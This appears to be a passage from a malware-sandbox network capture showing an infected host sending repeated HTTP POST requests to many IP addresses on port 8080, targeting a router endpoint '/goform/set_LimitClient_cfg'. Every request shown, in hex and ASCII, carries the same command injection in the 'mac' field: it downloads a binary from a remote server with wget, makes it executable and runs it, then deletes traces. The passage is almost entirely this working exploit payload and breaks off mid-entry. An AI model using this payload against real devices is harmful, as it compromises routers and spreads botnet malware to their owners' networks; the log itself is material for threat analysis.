                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2654192.168.2.2353566123.187.151.1178080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.450426102 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2655192.168.2.234685258.219.23.318080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.450437069 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2656192.168.2.234463218.63.195.568080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.450460911 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2657192.168.2.2335422118.209.100.78080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.474515915 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2658192.168.2.2334326123.116.86.468080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.474559069 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2659192.168.2.2358070185.247.100.218080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.474622011 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2660192.168.2.2347552117.193.153.828080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.474646091 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2661192.168.2.2358178103.122.135.1288080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.474654913 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2662192.168.2.235911889.85.6.1448080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.474700928 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2663192.168.2.234942482.106.223.1048080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.474714994 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2664192.168.2.2340712144.172.217.968080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.474751949 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2665192.168.2.233497684.59.100.1978080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.474756956 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2666192.168.2.234169290.50.203.1578080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.474776983 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2667192.168.2.2335270126.192.131.138080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.474801064 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2668192.168.2.2349202139.214.70.628080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.474818945 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2669192.168.2.233406632.240.140.208080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.474841118 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2670192.168.2.234365899.141.173.618080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.474864960 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2671192.168.2.2355666188.196.88.1458080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.475451946 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2672192.168.2.2349904176.41.61.1548080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.475462914 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2673192.168.2.235598077.15.163.838080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.475502968 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2674192.168.2.233805670.187.226.2538080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.475517988 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2675192.168.2.2333276117.117.60.2128080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.475537062 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2676192.168.2.2357682151.2.15.2238080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.475553989 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
